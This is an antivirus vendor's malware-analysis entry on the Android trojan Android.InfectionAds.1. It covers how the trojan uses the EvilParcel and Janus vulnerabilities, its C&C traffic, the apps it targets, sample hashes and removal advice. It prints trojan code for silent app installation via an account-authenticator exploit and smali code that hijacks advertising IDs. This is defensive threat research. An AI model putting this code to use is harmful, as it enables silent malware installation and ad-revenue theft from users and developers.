Defend what you create

その他

  • free.drweb.co.jp: 無料ユーティリティ、プラグイン、インフォーマー
  • av-desk.com: Dr.Web AV-Deskサービスプロバイダーのためのインターネットサービス
  • curenet.drweb.co.jp:ネットワーク修復ユーティリティDr.Web CureNet!
閉じる

マイライブラリ
マイライブラリ

+ マイライブラリに追加

電話
24時間体制サポート | テクニカルサポート利用方法

お問い合わせ履歴

電話する

+7 (495) 789-45-86

Profile

Android.InfectionAds.1

Added to the Dr.Web virus database:2019-02-15
Virus description added:

Android.InfectionAds.1 is a Trojan running on Android devices. It exploits several critical vulnerabilities to infect APK files and independently install other applications. In addition, Android.InfectionAds.1 displays ads. The attackers embed the Trojan into the initially benign software and then distribute it via third-party stores and software collections for Android. The following description is based on the analysis of its modification (dd82f232cf647463720d54b44917a218a6ddfefa).

Trojan structure

See below the structure of Android.InfectionAds.1:

screenshot Android.InfectionAds.1 #drweb

Malicious modules:

  • resa.data.encry — an APK file with the copy of Android.InfectionAds.1 and its plugins;
  • adsdk.zip — the main module that controls all the other components of the Trojan and performs all malicious actions;
  • patch.zip — a module that modifies (infects) the compromised applications;
  • boot.zip — a module that embeds in other programs upon infection;
  • bak.zip — a module for assembling or disassembling the smali/baksmali code in the compromised applications;
  • ad.zip — an adware module.

How it starts

The Trojan launches when the startSDKInit(Application) method of the com.android.support.multidex.MultiDexApplication class is called; it is usually called in the Application class of Android applications. In some versions of Android.InfectionAds.1, this method is called using reflection.

The Trojan decrypts the /assets/resa.data.encry archive, stored in its file share, extracts the modules adsdk.zip (/assets/DIsplay2.jpg) and patch.zip (/assets/DIsplay3.jpg) to load them into RAM.

Then, using reflection, it attempts to call the following methods:

  • com.infectionAds.AdsManagement.init(Application);
  • com.StatisticsSdk.AliUtil.init(Application);
  • com.infectionapk.patchMain(Context).

In the instance of Android.InfectionAds.1 we have analyzed, only the com.infectionAds.AdsManagement.init(Application) method was present. It is implemented in the main malicious module, adsdk.zip. After calling the method, the Trojan performs the following actions:

  • launches the adware module;
  • installs the application located in /assets;
  • downloads and installs applications at the command from the server;
  • checks for already infected with it apps on the device;
  • sends an Intent to launch available services of infected applications;
  • infects the applications, specified by the command and control server (if it fails to connect to the server, it infects programs from the default list).

Automated installation of applications

Android.InfectionAds.1 is able to install applications independently from user. For that, the Trojan uses the critical vulnerability of Android, CVE-2017-13315, which falls under the EvilParcel class. It has been implemented using the Proof of Concept code, created by information security researchers.

Android.InfectionAds.1 registers an account authentication service in the AndroidManifest.xml file:

<service android:name="com.android.leech.main.service.AuthService">
  <intent-filter>
    <action android:name="android.accounts.AccountAuthenticator" />
  </intent-filter>
  <meta-data android:name="android.accounts.AccountAuthenticator" android:resource="@xml/authenticator" />
</service>

The type of files for authentication is specified in the authenticator.xml file:

<?xml version="1.0" encoding="UTF-8"?>
<account-authenticator android:accountType="com.ovilex.fs18.account100" android:label="@string/app_name" xmlns:android=" />

Android.InfectionAds.1 creates a specific Bundle object to exploit the EvilParcel vulnerability and enhance its privileges. Within the object, it creates an Intent that runs the activity of the package manager. The Trojan sends specific parameters to this activity, including the path to the installed application. The package manager processes the Trojan’s Intent as a system Intent and installs the program.

Code for the account authentication service, used by the Trojan:

import android.accounts.AbstractAccountAuthenticator;
import android.accounts.Account;
import android.accounts.AccountAuthenticatorResponse;
import android.accounts.NetworkErrorException;
import android.app.Service;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.os.IBinder;
 
public class AuthService extends Service {
  class Authenticator extends AbstractAccountAuthenticator {
    Authenticator(Context arg1) {
      super(arg1);
    }
 
    public Bundle addAccount(AccountAuthenticatorResponse arg6, String arg7, String arg8, String[] arg9, Bundle arg10) throws NetworkErrorException {
      Bundle v0;
      if(arg10 == null) {
        v0 = null;
      }
      else {
        v0 = null;
        String v1 = arg10.getString("bundle_type");
        if("type_install".equals(v1)) {
          v0 = Installer.createInstallBundle(arg10);
        }
        else if("type_uninstall".equals(v1)) {
          v0 = Installer.createUnInstallBundle(arg10);
        }
 
        if(v0 == null) {
          return v0;
        }
 
      }
 
      return v0;
    }
 
    public Bundle confirmCredentials(AccountAuthenticatorResponse arg2, Account arg3, Bundle arg4) throws NetworkErrorException {
      return null;
    }
 
    public Bundle editProperties(AccountAuthenticatorResponse arg2, String arg3) {
      return null;
    }
 
    public Bundle getAuthToken(AccountAuthenticatorResponse arg2, Account arg3, String arg4, Bundle arg5) throws NetworkErrorException {
      return null;
    }
 
    public String getAuthTokenLabel(String arg2) {
      return null;
    }
 
    public Bundle hasFeatures(AccountAuthenticatorResponse arg2, Account arg3, String[] arg4) throws NetworkErrorException {
      return null;
    }
 
    public Bundle updateCredentials(AccountAuthenticatorResponse arg2, Account arg3, String arg4, Bundle arg5) throws NetworkErrorException {
      return null;
    }
  }
 
  public AuthService() {
    super();
  }
 
  public IBinder onBind(Intent arg2) {
    return new Authenticator(((Context)this)).getIBinder();
  }
}

Code for the app installation launch:

private void doInstall(Context context, String path, String fakename) {
  try {
    Intent v3 = new Intent();
    v3.addFlags(FLAG_ACTIVITY_NEW_TASK);
    v3.addFlags(FLAG_ACTIVITY_NO_HISTORY);
    v3.addFlags(FLAG_ACTIVITY_NO_USER_ACTION);
    Bundle bundle = new Bundle();
    bundle.putString("apk_path", path);
    bundle.putString("fake_name", "com.android.vending");
    bundle.putString("bundle_type", "type_install");
 
    String acc = "";
    if (!TextUtils.isEmpty(getAppMetaData(context, "CORE_ACCOUNT"))) {
        acc = context.getPackageName() + ".account100";
    }
 
    Log.d(TAG, "Starting activity.....");
      context.startActivity(v3.setClassName("android", "android.accounts.ChooseTypeAndAccountActivity").putExtra("allowableAccountTypes", new String[]{acc}).putExtra("addAccountOptions", bundle));
    Log.d(TAG, "Done!");
 
  } catch (Throwable v4) {
    Log.e(TAG, "Unable to perform installation!", v4);
    throw v4;
  }
}

Infection of other programs

Android.InfectionAds.1 is able to infect programs installed on Android devices. To do this, the Trojan uses the vulnerability CVE-2017-13156 (Janus). It helps the Trojan add its components in the target APK files without changing their digital signature. Then, using the EvilParcel vulnerability, Android.InfectionAds.1 installs infected applications as their own updates, replacing the originals. The programs remain operable, but when they are launched, the Trojan is the first to receive control.

Structure of applications with the embedded Android.InfectionAds.1:

screenshot Android.InfectionAds.1 #drweb

The executable file classes.dex from the Trojan module boot.zip contains Application classes matching the class names of the compromised applications. Because of that, upon launch of the infected programs, the Trojan class Application is called instead of the original one.

screenshot Android.InfectionAds.1 #drweb

To run the modules stored in the malware.zip archive, Android.InfectionAds.1 uses the modified library com.android.support.multidex. Instead of the original fle classes.dex of the infected application, its copy from the malware.zip archive is used.

Infection of programs occurs at the command of the C&C server http://sdk.android*****.org:8091/api/sdk.ad.requestList. The Trojan executes the following query:

{
  "id": ******8365385,
  "ver": 1,
  "client": {
    "host": {
      "sdk_ver": 1032,
      "sdk_ver_name": "1032",
      "channel": "9apps_com.ovilex.fs18",
      "type": 20,
      "app_id": "cbf7a6fb-4891-3d69-a0fa-7fba57dd230b",
      "md5": "cbf7a6fb-4891-3d69-a0fa-7fba57dd230b",
      "pkg_name": "com.magnet.torrent.cat",
      "app_name": "Google Installer",
      "ver_code": 9,
      "ver_name": "1.9"
    },
    "sys": {
      "brand": "Sony",
      "model": "D6603",
      "hardware": "qcom",
      "api_level": 23,
      "cpu_abi": "armeabi-v7a",
      "fingerprint": "Sony\\/D6603\\/D6603:6.0.1\\/23.5.A.1.291\\/2769308465:user\\/release-keys",
      "kernel": "Linux version 3.4.0-perf-gc14c2d5 (BuildUser@BuildHost) (gcc version 4.9.x-google 20140827 (prerelease) (GCC) ) #1 SMP PREEMPT Tue Jun 28 11:15:51 2016",
      "sec_patch": "2016-05-01",
      "scr_size": "1080x1776",
      "mob_id": "16a83ba6-5253-3565-856b-c0bcfdca5f34",
      "country": "en_US",
      "network": 2,
      "gaid": "a31749cc-5228-4eac-aea0-513ed2bf86c4"
    }
  },
  "data": {},
  "sign": "1B2M2Y8AsgTpgAmY7PhCfg=="
}

In response, it can get a list of applications that it needs to infect. For example:

{
  "data": {
    "is_patchself": false,
    "is_infect": true,
    "targets": [
      {
        "activity": "",
        "app_cls": "",
        "key": "",
        "order": 1,
        "pkg_name": "com.whatsapp",
        "secret": "",
        "text": "",
        "title": "",
        "type": ""
      },
      {
        "order": 2,
        "pkg_name": "com.mxtech.videoplayer.ad"
      },
      {
        "order": 3,
        "pkg_name": "com.lenovo.anyshare.gps"
      },
      {
        "activity": "",
        "app_cls": "",
        "key": "",
        "order": 6,
        "pkg_name": "cn.xender",
        "secret": "",
        "text": "",
        "title": "",
        "type": ""
      }
    ]
  },
  "id": ******5158718,
  "state": {
    "msg": "success",
    "code": 2000000
  }
}

The server commands may contain the parameter "is_patchself": true. If it is present, the Trojan attempts to apply a patch to the application code, into which it is embedded. To do this, it uses the backsmali/smali utilities in the bak.zip module.

If the server is not available, the Trojan infects programs from the default list. Each version of Android.InfectionAds.1 has its own list of target applications. For example (in the version dd82f232cf647463720d54b44917a218a6ddfefa):

  • com.whatsapp (WhatsApp Messenger);
  • com.lenovo.anyshare.gps (SHAREit - Transfer & Share);
  • com.mxtech.videoplayer.ad (MX Player);
  • com.jio.jioplay.tv (JioTV - Live TV & Catch-Up);
  • com.jio.media.jiobeats (JioSaavn Music & Radio – including JioMusic);
  • com.jiochat.jiochatapp (JioChat: HD Video Call);
  • com.jio.join (Jio4GVoice);
  • com.good.gamecollection;
  • com.opera.mini.native (Opera Mini - fast web browser);
  • in.startv.hotstar (Hotstar);
  • com.meitu.beautyplusme (PlusMe Camera - Previously BeautyPlus Me);
  • com.domobile.applock (AppLock);
  • com.touchtype.swiftkey (SwiftKey Keyboard);
  • com.flipkart.android (Flipkart Online Shopping App);
  • cn.xender (Share Music & Transfer Files – Xender);
  • com.eterno (Dailyhunt (Newshunt) - Latest News, LIVE Cricket);
  • com.truecaller (Truecaller: Caller ID, spam blocking & call record);
  • com.ludo.king (Ludo King™).

Application download

To download applications, Android.InfectionAds.1 sends a POST request to the command and control server http://sdk.android*****.org:8091/api/sdk.ad.requestRes:

{
  "id": ******8364488,
  "ver": 1,
  "client": {
    "host": {
      "sdk_ver": 1032,
      "sdk_ver_name": "1032",
      "channel": "9apps_com.ovilex.fs18",
      "type": 20,
      "app_id": "cbf7a6fb-4891-3d69-a0fa-7fba57dd230b",
      "md5": "cbf7a6fb-4891-3d69-a0fa-7fba57dd230b",
      "pkg_name": "com.magnet.torrent.cat",
      "app_name": "Google Installer",
      "ver_code": 9,
      "ver_name": "1.9"
    },
    "sys": {
      "brand": "Sony",
      "model": "D6603",
      "hardware": "qcom",
      "api_level": 23,
      "cpu_abi": "armeabi-v7a",
      "fingerprint": "Sony\\/D6603\\/D6603:6.0.1\\/23.5.A.1.291\\/2769308465:user\\/release-keys",
      "kernel": "Linux version 3.4.0-perf-gc14c2d5 (BuildUser@BuildHost) (gcc version 4.9.x-google 20140827 (prerelease) (GCC) ) #1 SMP PREEMPT Tue Jun 28 11:15:51 2016",
      "sec_patch": "2016-05-01",
      "scr_size": "1080x1776",
      "mob_id": "16a83ba6-5253-3565-856b-c0bcfdca5f34",
      "country": "en_US",
      "network": 2,
      "gaid": "a31749cc-5228-4eac-aea0-513ed2bf86c4"
    }
  },
  "data": {
    "request_type": 252
  },
  "sign": "IYnEH9upaOzxds80ky1qAw=="
}

Server’s response:

{
  "data": {
    "reses": [
      {
        "activity_name": "",
        "app_name": "spollo",
        "backup_url": "https://**********-2.amazonaws.com/******/coreapp/core_5042.zip",
        "bugly_id": "a29646e2da",
        "bugly_md5": "asd",
        "bugly_sha": "asd",
        "bugly_vercode": 5042,
        "bugly_vername": "5042",
        "feature_type": 1,
        "filename": "spollo.apk",
        "forceDownload": true,
        "force_download": true,
        "is_active": true,
        "md5": "asd",
        "mode": 1,
        "pkg_name": "com.spollo.player.pro",
        "service_name": "",
        "tinker_id": "update.1",
        "type": 8,
        "ver": 5042
      }
    ]
  },
  "id": 1550585157842,
  "state": {
    "msg": "success",
    "code": 2000000
  }
}

Using the data it receives, the Trojan requests the download of files using a third-party SDK. This SDK accesses the server at http://android.bugly.**.com/rqd/async?aid=*****b1e-5c6a-46*****8a-f87775c00e08, which sends the command to download applications. See below an example of the server response with a link to download one of the modifications of Android.InfectionAds.1 from https://s.beta.gtimg.com/rdmimg/hot_patch/*****6e2da/*****381-1c3b-4736-b8c1-38ab*****f8b.zip:

screenshot Android.InfectionAds.1 #drweb

After downloading the files, the Trojan automatically installs them, exploiting the vulnerability CVE-2017-13315.

Displaying advertisements

Android.InfectionAds.1 overlays banner ads over windows of other applications and the operating system interface, making it difficult to work with the device. The ad.zip module is responsible for that. After launch, it connects to the C&C server at http://sdk.android*****.org:8091/api/sdk.ad.requestAds and requests parameters for generating banners. See below an example of such a request:

{
   "id":******5698357,
   "ver":1,
   "client":{
      "host":{
         "sdk_ver":1032,
         "sdk_ver_name":"1032",
         "channel":"9apps_com.ovilex.fs18",
         "type":20,
         "app_id":"95c29dcd-5bf0-32d4-a456-b522a04948fb",
         "md5":"95c29dcd-5bf0-32d4-a456-b522a04948fb",
         "pkg_name":"com.magnet.torrent.cat",
         "app_name":"Google Installer",
         "ver_code":9,
         "ver_name":"1.9"
      },
      "sys":{
         "brand":"Sony",
         "model":"D6603",
         "hardware":"qcom",
         "api_level":23,
         "cpu_abi":"armeabi-v7a",
         "fingerprint":"Sony\/D6603\/D6603:6.0.1\/23.5.A.1.291\/2769308465:user\/release-keys",
         "kernel":"Linux version 3.4.0-perf-gc14c2d5 (BuildUser@BuildHost) (gcc version 4.9.x-google 20140827 (prerelease) (GCC) ) #1 SMP PREEMPT Tue Jun 28 11:15:51 2016",
         "sec_patch":"2016-05-01",
         "scr_size":"1776x1080",
         "mob_id":"16a83ba6-5253-3565-856b-c0bcfdca5f34",
         "country":"en_US",
         "network":2,
         "gaid":"a31749cc-5228-4eac-aea0-513ed2bf86c4"
      }
   },
   "data":{
   },
   "sign":"1B2M2Y8AsgTpgAmY7PhCfg=="
}

The server replies with the requested parameters:

{
  "data": {
    "ads": [
      {
        "ad_id": "ca-app-pub-4710775276341168/4902575147",
        "ad_type": 1,
        "app_id": "ca-app-pub-4710775276341168~5649267333",
        "app_secret": "",
        "delay_tm": 0,
        "enable": true,
        "interval_tm": 15,
        "limit": 0,
        "platform": "GP",
        "request_tm": 180,
        "scene": 2,
        "weight": 7
      },
      {
        "ad_id": "ca-app-pub-4710775276341168/9588512340",
        "ad_type": 1,
        "app_id": "ca-app-pub-4710775276341168~4719329047",
        "delay_tm": 0,
        "enable": true,
        "interval_tm": 15,
        "limit": 0,
        "platform": "GP",
        "request_tm": 180,
        "scene": 2,
        "weight": 10
      }
    ]
  },
  "id": ******5698357,
  "state": {
    "msg": "success",
    "code": 2000000
  }
}

The Trojan can also modify the code of advertising SDKs, for example, Admob. To do this, Android.InfectionAds.1 modifies the code of the constructor <init>(Landroid/content/Context;Ljava/lang/String;)V of the class com.google.android.gms.ads.AdLoader.Builder, adding new smali code in there:

invoke-static {p1,p2}, Lcom/infectionAds/APIPulic;->AdLoader_Builder_init(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/String;
move-result-object p2

When an infected application requests parameters for displaying an advertisement, the APIPulic.AdLoader_Builder_init(Object, Object) method responds with the Trojan's advertising ID. Then the original advertising identifier is replaced by the one from the Trojan. As a result, all profits from displaying banners are received by virus writers, not the developers of infected programs.

Android.InfectionAds.1 adds to the code of several services a call to its method APIPulic.onStartCommand(Object, Object, int, int), which requests new advertising identifiers. The following classes are modified:

  • com.google.android.gms.analytics.AnalyticsService;
  • com.google.android.gms.analytics.CampaignTrackingService;
  • com.google.firebase.iid.zzb.

Besides, the Trojan interferes with the work of other advertising platforms—for example, Mopub.

Samples:

Infected applications:

  • 4cdf13c50bcf7b7b11ea20b91b2d15356e044f1f – com.Mobiappsfun.TablaaORG2019.ORGPianoGuitarRobabDigitalmusicApp – Android.InfectionAds.1
  • dd82f232cf647463720d54b44917a218a6ddfefa – com.ovilex.fs18 – Android.InfectionAds.1
  • 97fc5ed669aa0cfeb58c76c59ebafd665c6de9f6 – com.king.touchongirls.plus – Android.InfectionAds.1
  • 2bda50e97b0c372fcfb479f906bed6ae6172263c – com.samtexlab.dkhdkamera.pro – Android.InfectionAds.1

Trojan modules included in Android.InfectionAds.1:

  • res.data.encry (installed as a separate applications):
    • 46e01d16d0799ee8ad36fbdeb13fc7ef8dc99710 – com.magnet.torrent.cat – Android.InfectionAds.3
    • 82e5651e2f8f0b868e030db7a0169f36a458b5ff – com.caynax.alarmclock – Android.InfectionAds.4
    • 42c45ee564ff50d2e3998f1ba09acb8a7fdb06ec – com.android.google.coreappx – Android.InfectionAds.1
    • 46998d33654cdb600ae4d807efb1fd5b98985dfc – com.king.fiveroad – Android.InfectionAds.1

Other trojan modules:

  • fbea328adfa1355159e5e590fa1e929c0524a0e5 – boot.zip (/assets/DIsplay1.jpg) – Android.InfectionAds.1
  • 4ccfbaf42c44a7a92d7ed574c3547d2fc174458a – adsdk.zip (/assets/DIsplay2.jpg) – Android.InfectionAds.1
  • dc8776e132e11984e9be58e3bd5878641eb06274 – patch.zip (/assets/DIsplay3.jpg) – Android.InfectionAds.3.origin
  • 79cde09d6b7b44c27852f189676289749ad2d115 – bak.zip (/assets/DIsplay4.jpg)
  • 2e2c8e59eeaaadab3de355dcaa43c287c161ea68 – ad.zip (/assets/DIsplay5.jpg) – Android.InfectionAds.2

News about the Trojan

Curing recommendations


Android

  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web для Android Light onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

ロシアに本社を置く、『Dr.Webアンチウイルスソフトウェア』のデベロッパーです。

1992年に製品の開発をスタートしました。

Dr.Webは世界200ヶ国以上のユーザーに利用されています。

2007 年、アンチウウイルスサービス(SaaS)の提供が開始しました。

24時間体制サポート

© Doctor Web
2003 — 2019

Doctor Webは、ロシアに本社を置く、『Dr.Webアンチウイルスソフトウェア』のデベロッパーです。その製品の開発は1992年に始まりました。

株式会社Doctor Web Pacific 〒105-0003 東京都港区西新橋1-14-10 西新橋スタービル 2F